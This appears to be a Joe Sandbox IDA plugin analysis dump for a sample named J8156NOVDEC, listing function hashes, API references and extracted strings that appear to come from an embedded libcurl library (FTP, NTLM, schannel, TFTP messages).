    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: 7$7
    • API String ID: 0-2536533678
    • Opcode ID: 880485ab9dfaf2a56aad19bb6ff07e68db6320949b24677b7bdef49be001b2ff
    • Instruction ID: d888c2cc7a82cd413ba9a7b4faf444caf503eee4cdd254ce7b4f60ac501123ce
    • Opcode Fuzzy Hash: 880485ab9dfaf2a56aad19bb6ff07e68db6320949b24677b7bdef49be001b2ff
    • Instruction Fuzzy Hash: A0B1CFB1E00209DBDB24DF64D845BEEB7B2BF45304F1482A9E9186B382D735D992CF61
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
    • Opcode ID: 87be8906a39fdc7d4e727b398545d24e26840713610a19b7e63d6b3b1ad24345
    • Instruction ID: 863ce997bd2a79d7f0b797d37e11e94255626b6d217e3a33f5f1bf418fe245f1
    • Opcode Fuzzy Hash: 87be8906a39fdc7d4e727b398545d24e26840713610a19b7e63d6b3b1ad24345
    • Instruction Fuzzy Hash: C091B430D05149BFDF14CE69C4A16FDBBB2EF57360F18825BE865AF391D2B089428B51
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AECA7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: NTLM$NTLM
    • API String ID: 930174750-1640376890
    • Opcode ID: 478003884a99082d35423df66724a50644629bf46659bf1d12fa992a3fd9f667
    • Instruction ID: 591d5a51833ab65cd44549e3ff221c32982fd8840e3c21ba37b8cbfbf3038415
    • Opcode Fuzzy Hash: 478003884a99082d35423df66724a50644629bf46659bf1d12fa992a3fd9f667
    • Instruction Fuzzy Hash: A6917FB5A00109DFCB54EF58D885BDAB7B6BB49310F108219F9159B381C735ED82CFA1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: No URL set!$No URL set!
    • API String ID: 1951014933-3360990844
    • Opcode ID: 9cac80689a3aa39402233977467c86fda0c194a4c6725ad702541edc98ebeb99
    • Instruction ID: ec4522da59a01e6dffa8954fbcc87f325e1b07d696f56cf3c4b8a6632836f4c8
    • Opcode Fuzzy Hash: 9cac80689a3aa39402233977467c86fda0c194a4c6725ad702541edc98ebeb99
    • Instruction Fuzzy Hash: 69B10A74600249DFDB04CF58C498BEA7BA2BF49354F1881B9E84D9F742D735AA81CF82
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %lx
    • API String ID: 1951014933-1448181948
    • Opcode ID: 71adfa0552cc50dfddd3afd41f3223c61bf98fa25e52e0c3b1e4c63e28161453
    • Instruction ID: 0239f0a9fa05eeba6621bcf28e9813775363d365b54cf95890819619d08b54bc
    • Opcode Fuzzy Hash: 71adfa0552cc50dfddd3afd41f3223c61bf98fa25e52e0c3b1e4c63e28161453
    • Instruction Fuzzy Hash: 8EA10874E00219CBDB24EF98D844BEDBBB2FF46318F188259E465A7285DB305D86CF61
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: Set-Cookie:$Set-Cookie:
    • API String ID: 0-1461884226
    • Opcode ID: fde483fff2adc7c8ef3c7ea474f7ea932e1d4c950d167a6534a882220f99348e
    • Instruction ID: e63becba296633f0b82755a581dff716c0b7aae099856da81cbb8aed307a6b0f
    • Opcode Fuzzy Hash: fde483fff2adc7c8ef3c7ea474f7ea932e1d4c950d167a6534a882220f99348e
    • Instruction Fuzzy Hash: 5B917EB0D04209EFEF10DFA8C9457EEBBB2AB44305F148169ED0967341E775AA44CBA6
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065479A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: =$=
    • API String ID: 930174750-3372962515
    • Opcode ID: b8f022f784eaf568542f08adca8fae4eeb084646b58ce48a6dab0b15895146a6
    • Instruction ID: 0e06d02305a8fe5886305bc3f30cf70005e7283396bd05c8e18b61fd851305be
    • Opcode Fuzzy Hash: b8f022f784eaf568542f08adca8fae4eeb084646b58ce48a6dab0b15895146a6
    • Instruction Fuzzy Hash: A1915974D04248DFCF14CF98D894BEDBBB2AF4A309F248199E8156B381DB759E89CB50
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006902A6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: (){ %*]
    • API String ID: 930174750-731572209
    • Opcode ID: de5419b54659fa026659d6887af7bd57dc806f860e7d55a22eee1ad6f614ee1b
    • Instruction ID: f7dce26e863780adf6333b3fc20003d4b94bac874a5524d19d1e6d0be096248e
    • Opcode Fuzzy Hash: de5419b54659fa026659d6887af7bd57dc806f860e7d55a22eee1ad6f614ee1b
    • Instruction Fuzzy Hash: 4E717DB0E052599FEF04CFA8D891BFEBBB6BF49305F148059E811AB741C7359A41CBA4
    APIs
      • Part of subcall function 0068DD50: @_RTC_CheckStackVars@8.LIBCMT ref: 0068DE2F
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068C76C
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: TFTP response timeout
    • API String ID: 572576967-3820788777
    • Opcode ID: ce026c395a3dd0a9431d05ba66f020ab9d5720801950d8c260e56304bc7b3c87
    • Instruction ID: a7c39f6c3feb9abb295511283de50ba7b179be846246dbc64597754d4b73765d
    • Opcode Fuzzy Hash: ce026c395a3dd0a9431d05ba66f020ab9d5720801950d8c260e56304bc7b3c87
    • Instruction Fuzzy Hash: A3717CB5D04209DBDB50EF58C841BEEB7B6AB05320F208399E5296B3C1D7349A85CFA1
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Getcoll
    • String ID: Atn$Atn
    • API String ID: 2952761671-1995442299
    • Opcode ID: 61e58d75ec38c0fcdb1e6693b2d1d12b7b345663633abf307d981c6c55df0a51
    • Instruction ID: 7701e4ff550976e9aeaf15fc36b654919a068bd9cf068857b5b001e69fffccf8
    • Opcode Fuzzy Hash: 61e58d75ec38c0fcdb1e6693b2d1d12b7b345663633abf307d981c6c55df0a51
    • Instruction Fuzzy Hash: 8E51E3719002489BEB08DF68C9447EDFBB2FF45314F24C25CE456AB386D736A986CB90
    APIs
      • Part of subcall function 0066D3E0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0067E522,?), ref: 0066D412
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D434
      • Part of subcall function 0066D3E0: __allrem.LIBCMT ref: 0066D454
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D477
      • Part of subcall function 0066D3E0: @_RTC_CheckStackVars@8.LIBCMT ref: 0066D4E3
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006638EC
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006639CE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackUnothrow_t@std@@@Vars@8__ehfuncinfo$??2@$CounterPerformanceQuery__allrem
    • String ID: Connection time-out
    • API String ID: 3540432321-165637984
    • Opcode ID: 691c6c940f645abd7e9d3f1874b0b8a98f414edfae55ba4e1b866ebb0360129f
    • Instruction ID: 0e1b99fccd592e0938e59dabfd32e70d4ae7f8882b391b909e3e777fcdac7f0f
    • Opcode Fuzzy Hash: 691c6c940f645abd7e9d3f1874b0b8a98f414edfae55ba4e1b866ebb0360129f
    • Instruction Fuzzy Hash: 6A713DB4A002089FDB08DF58C495BEDBBB6EB88314F10817DE919AB391D775DE81CB94
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0069E290
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E3E9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: Content-Length: %I64d
    • API String ID: 88142382-326554249
    • Opcode ID: 0059f996b7957f8f0e92dfcd7c6854248c7e56a595d6fad06b67c3b7ebb254ac
    • Instruction ID: 14f4253d2c01281943101a7cdbacc65f6764a53a1bc9591de322cdf0fe0b5fba
    • Opcode Fuzzy Hash: 0059f996b7957f8f0e92dfcd7c6854248c7e56a595d6fad06b67c3b7ebb254ac
    • Instruction Fuzzy Hash: C95161B5D00209EFDF10DFA8D881AEEB7BAAF48310F14416DE515B7381D7319A80CBA5
    APIs
    • ReadFile.KERNEL32(?,00000000,00000002,?,00000000,00000000,00000000,?), ref: 006D6ABF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: FileRead
    • String ID: qm$qm
    APIs
    Strings
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: realm
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: OS/400$SITE NAMEFMT 1
    APIs
    Strings
    Similarity
    • API ID: _strlen
    • String ID: 8$Command failed: %d
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F416
      • Part of subcall function 0065F090: @_RTC_CheckStackVars@8.LIBCMT ref: 0065F287
    Strings
    • Connecting to hostname: %s, xrefs: 0065F379
    • Connecting to port: %d, xrefs: 0065F3D7
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Connecting to hostname: %s$Connecting to port: %d
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00694231
    Strings
    • No known authentication mechanisms supported!, xrefs: 0069420A
    • C, xrefs: 0069421D
    Similarity
    • API ID: CheckStackVars@8
    • String ID: C$No known authentication mechanisms supported!
    APIs
    • _strlen.LIBCMT ref: 006A6BF2
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A6C37
      • Part of subcall function 006BF68C: ___report_securityfailure.LIBCMT ref: 006BF691
    Strings
    Similarity
    • API ID: CheckStackVars@8___report_securityfailure_strlen
    • String ID: %d.%d.%d.%d
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00691513
    Strings
    • No known authentication mechanisms supported!, xrefs: 006914EC
    • C, xrefs: 006914FF
    Similarity
    • API ID: CheckStackVars@8
    • String ID: C$No known authentication mechanisms supported!
    APIs
      • Part of subcall function 006B51C0: @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00694A40
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Authentication cancelled$C
    APIs
      • Part of subcall function 00662840: @_RTC_CheckStackVars@8.LIBCMT ref: 006628BE
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067F3D2
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • WSAGetLastError.WS2_32 ref: 0067F2A6
    Strings
    • Q, xrefs: 0067F33C
    • schannel: timed out sending data (bytes sent: %zd), xrefs: 0067F251
    Similarity
    • API ID: CheckStackVars@8$ErrorLast
    • String ID: Q$schannel: timed out sending data (bytes sent: %zd)
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E66E
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • Failed FTP upload: %0d, xrefs: 0069E5B9
    • Data conn was not available immediately, xrefs: 0069E63C
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: Data conn was not available immediately$Failed FTP upload: %0d
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: =$AQ==
    APIs
      • Part of subcall function 006B51C0: @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006920EF
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Authentication cancelled$C
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00696463
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • No known authentication mechanisms supported!, xrefs: 0069643C
    • C, xrefs: 0069644F
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: C$No known authentication mechanisms supported!
    APIs
    Strings
    Similarity
    • API ID: _strlen
    • String ID: WinIDN$libcurl/7.67.1-DEV
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006877CE
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    Similarity
    • API ID: Stack$CheckFailureVars@8
    • String ID: 'eh$'eh
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00660BAD
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • NTLM-proxy picked AND auth done set, clear picked!, xrefs: 00660AA5
    • NTLM picked AND auth done set, clear picked!, xrefs: 00660A61
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!
    APIs
      • Part of subcall function 006B51C0: @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00697098
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Authentication cancelled$C
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: CWD %s$Failed to MKD dir: %03d
    Strings
    Similarity
    • API ID:
    • String ID: `+p$tftp_send_first: internal error
    APIs
    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00682408
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00682436
    Strings
    Similarity
    • API ID: CertCertificateCheckContextFreeStackVars@8
    • String ID: U'h$schannel: failed to retrieve remote cert context
    APIs
    Strings
    Similarity
    • API ID: _strlen_strpbrk
    • String ID: \/@
    APIs
    Strings
    Similarity
    • API ID: _free
    • String ID: al%08X$%08X
    • API String ID: 269201875-2095630812
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00687665
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    Similarity
    • API ID: Stack$CheckFailureVars@8
    • String ID: Ieh$Ieh
    • API String ID: 3742378178-3061626143
    APIs
    • GetOEMCP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E0091
    • GetACP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E00A8
    Strings
    Similarity
    • API ID:
    • String ID: al%08X
    • API String ID: 0-2725849004
    APIs
      • Part of subcall function 00633770: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,006C10C9,?,?,?,0063105A), ref: 00633775
      • Part of subcall function 00633770: GetLastError.KERNEL32(?,?,?,0063105A), ref: 0063377F
    • IsDebuggerPresent.KERNEL32(?,?,?,0063105A), ref: 006C10CD
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0063105A), ref: 006C10DC
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006C10D7
    Memory Dump Source
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 3511171328-631824599